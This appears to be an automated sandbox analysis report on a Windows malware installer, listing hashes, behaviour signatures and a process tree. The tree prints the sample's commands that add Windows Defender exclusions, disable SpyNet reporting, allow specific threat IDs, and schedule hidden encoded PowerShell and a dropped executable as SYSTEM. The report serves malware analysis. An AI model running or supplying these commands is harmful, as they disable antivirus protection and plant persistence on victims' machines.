Resubmissions

15-11-2024 18:05

241115-wpjcdsxrdy 10

11-11-2024 21:40

241111-1h6xbsxcql 10

03-12-2022 17:54

221203-wg4ncscc33 10

Analysis

  • max time kernel
    1776s
  • max time network
    1787s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20241023-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
  • submitted
    15-11-2024 18:05

General

  • Target

    9d8729b9ca0547bf3679e88b9c2c5ae941fcfe67dfd7dfc598cb304d6624ddde.exe

  • Size

    6.3MB

  • MD5

    ded964e022a37d93d434091ec75f9881

  • SHA1

    e89a551ac1f19dc3838e21157667e2f98d84d06b

  • SHA256

    9d8729b9ca0547bf3679e88b9c2c5ae941fcfe67dfd7dfc598cb304d6624ddde

  • SHA512

    13f0873cc797eeb7a4a1606ea3dc95f0d1f96bf1dfad286ee3959f0b885426214c24c1ea2422a46191f78063b75200d7ad9065d5654a7758086a9e41f7cf75af

  • SSDEEP

    196608:91OEVXHF+E/eq7QuIUVUMxVuAK1X84eu/k9RD13q:3OEVV+tq7Q7U62AAi84VkF13q

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 3 IoCs
  • Indirect Command Execution 1 TTPs 2 IoCs

    Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.

  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 1 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Drops file in System32 directory 11 IoCs
  • Drops file in Program Files directory 13 IoCs
  • Drops file in Windows directory 5 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 11 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 40 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\9d8729b9ca0547bf3679e88b9c2c5ae941fcfe67dfd7dfc598cb304d6624ddde.exe
    "C:\Users\Admin\AppData\Local\Temp\9d8729b9ca0547bf3679e88b9c2c5ae941fcfe67dfd7dfc598cb304d6624ddde.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2572
    • C:\Users\Admin\AppData\Local\Temp\7zS5DC0.tmp\Install.exe
      .\Install.exe /S /site_id "525403"
      2⤵
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Drops file in System32 directory
      • System Location Discovery: System Language Discovery
      • Enumerates system info in registry
      • Suspicious use of WriteProcessMemory
      PID:2172
      • C:\Windows\SysWOW64\forfiles.exe
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
        3⤵
        • Indirect Command Execution
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3364
        • C:\Windows\SysWOW64\cmd.exe
          /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:4300
          • \??\c:\windows\SysWOW64\reg.exe
            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
            5⤵
              PID:3484
            • \??\c:\windows\SysWOW64\reg.exe
              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
              5⤵
              • System Location Discovery: System Language Discovery
              PID:4704
        • C:\Windows\SysWOW64\forfiles.exe
          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
          3⤵
          • Indirect Command Execution
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1028
          • C:\Windows\SysWOW64\cmd.exe
            /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
            4⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:3624
            • \??\c:\windows\SysWOW64\reg.exe
              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
              5⤵
              • System Location Discovery: System Language Discovery
              PID:4260
            • \??\c:\windows\SysWOW64\reg.exe
              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
              5⤵
              • System Location Discovery: System Language Discovery
              PID:652
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /CREATE /TN "gjMaqMWaQ" /SC once /ST 06:25:28 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
          3⤵
          • System Location Discovery: System Language Discovery
          • Scheduled Task/Job: Scheduled Task
          PID:2912
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /run /I /tn "gjMaqMWaQ"
          3⤵
          • System Location Discovery: System Language Discovery
          PID:640
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /DELETE /F /TN "gjMaqMWaQ"
          3⤵
          • System Location Discovery: System Language Discovery
          PID:4544
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /CREATE /TN "bKwcWZekAnYWEgmozo" /SC once /ST 18:24:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu\mXQpfNlKnkevdXC\qwhSWDQ.exe\" q8 /site_id 525403 /S" /V1 /F
          3⤵
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Scheduled Task/Job: Scheduled Task
          PID:2736
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE" -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
      1⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4236
      • C:\Windows\system32\gpupdate.exe
        "C:\Windows\system32\gpupdate.exe" /force
        2⤵
          PID:4892
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
        1⤵
          PID:3524
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
          1⤵
          • Drops file in Windows directory
          PID:5044
        • C:\Windows\system32\gpscript.exe
          gpscript.exe /RefreshSystemParam
          1⤵
            PID:3356
          • C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu\mXQpfNlKnkevdXC\qwhSWDQ.exe
            "C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu\mXQpfNlKnkevdXC\qwhSWDQ.exe" q8 /site_id 525403 /S
            1⤵
            • Executes dropped EXE
            • Drops file in System32 directory
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2440
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"
              2⤵
              • Drops file in System32 directory
              • System Location Discovery: System Language Discovery
              • Modifies data under HKEY_USERS
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:2108
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                3⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:3396
                • C:\Windows\SysWOW64\reg.exe
                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                  4⤵
                  • System Location Discovery: System Language Discovery
                  PID:4628
              • C:\Windows\SysWOW64\reg.exe
                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                3⤵
                  PID:4220
                • C:\Windows\SysWOW64\reg.exe
                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:4444
                • C:\Windows\SysWOW64\reg.exe
                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:3700
                • C:\Windows\SysWOW64\reg.exe
                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                  3⤵
                    PID:4072
                  • C:\Windows\SysWOW64\reg.exe
                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:5068
                  • C:\Windows\SysWOW64\reg.exe
                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                    3⤵
                      PID:1716
                    • C:\Windows\SysWOW64\reg.exe
                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                      3⤵
                        PID:3572
                      • C:\Windows\SysWOW64\reg.exe
                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                        3⤵
                        • System Location Discovery: System Language Discovery
                        PID:3152
                      • C:\Windows\SysWOW64\reg.exe
                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                        3⤵
                        • System Location Discovery: System Language Discovery
                        PID:4000
                      • C:\Windows\SysWOW64\reg.exe
                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                        3⤵
                          PID:4092
                        • C:\Windows\SysWOW64\reg.exe
                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                          3⤵
                          • System Location Discovery: System Language Discovery
                          PID:1100
                        • C:\Windows\SysWOW64\reg.exe
                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                          3⤵
                            PID:1652
                          • C:\Windows\SysWOW64\reg.exe
                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                            3⤵
                              PID:1352
                            • C:\Windows\SysWOW64\reg.exe
                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                              3⤵
                              • System Location Discovery: System Language Discovery
                              PID:2068
                            • C:\Windows\SysWOW64\reg.exe
                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                              3⤵
                              • System Location Discovery: System Language Discovery
                              PID:3568
                            • C:\Windows\SysWOW64\reg.exe
                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                              3⤵
                              • System Location Discovery: System Language Discovery
                              PID:4004
                            • C:\Windows\SysWOW64\reg.exe
                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                              3⤵
                              • System Location Discovery: System Language Discovery
                              PID:5040
                            • C:\Windows\SysWOW64\reg.exe
                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                              3⤵
                                PID:3456
                              • C:\Windows\SysWOW64\reg.exe
                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                3⤵
                                • System Location Discovery: System Language Discovery
                                PID:4788
                              • C:\Windows\SysWOW64\reg.exe
                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                3⤵
                                • System Location Discovery: System Language Discovery
                                PID:1952
                              • C:\Windows\SysWOW64\reg.exe
                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                3⤵
                                  PID:4620
                                • C:\Windows\SysWOW64\reg.exe
                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                  3⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:5028
                                • C:\Windows\SysWOW64\reg.exe
                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                  3⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:4404
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RqtPwFqMTiUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RqtPwFqMTiUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\UBqYudvSNocU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\UBqYudvSNocU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZUXSmeDRU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZUXSmeDRU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oXjeNNLqKAotC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oXjeNNLqKAotC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\xonCRuklPFipnPeqKpR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\xonCRuklPFipnPeqKpR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hrOORTLiECQfZJVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hrOORTLiECQfZJVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\YSrBLfWUtIHnuviW\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\YSrBLfWUtIHnuviW\" /t REG_DWORD /d 0 /reg:64;"
                                2⤵
                                • Drops file in System32 directory
                                • Modifies data under HKEY_USERS
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:520
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RqtPwFqMTiUn" /t REG_DWORD /d 0 /reg:32
                                  3⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:3308
                                  • C:\Windows\SysWOW64\reg.exe
                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RqtPwFqMTiUn" /t REG_DWORD /d 0 /reg:32
                                    4⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:4008
                                • C:\Windows\SysWOW64\reg.exe
                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RqtPwFqMTiUn" /t REG_DWORD /d 0 /reg:64
                                  3⤵
                                    PID:1020
                                  • C:\Windows\SysWOW64\reg.exe
                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UBqYudvSNocU2" /t REG_DWORD /d 0 /reg:32
                                    3⤵
                                      PID:2480
                                    • C:\Windows\SysWOW64\reg.exe
                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UBqYudvSNocU2" /t REG_DWORD /d 0 /reg:64
                                      3⤵
                                        PID:4892
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZUXSmeDRU" /t REG_DWORD /d 0 /reg:32
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:2584
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZUXSmeDRU" /t REG_DWORD /d 0 /reg:64
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:3392
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oXjeNNLqKAotC" /t REG_DWORD /d 0 /reg:32
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:328
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oXjeNNLqKAotC" /t REG_DWORD /d 0 /reg:64
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:1316
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xonCRuklPFipnPeqKpR" /t REG_DWORD /d 0 /reg:32
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:1276
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xonCRuklPFipnPeqKpR" /t REG_DWORD /d 0 /reg:64
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:1876
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\hrOORTLiECQfZJVB /t REG_DWORD /d 0 /reg:32
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:4624
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\hrOORTLiECQfZJVB /t REG_DWORD /d 0 /reg:64
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:1044
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu /t REG_DWORD /d 0 /reg:32
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:3084
                                      • C:\Windows\SysWOW64\reg.exe
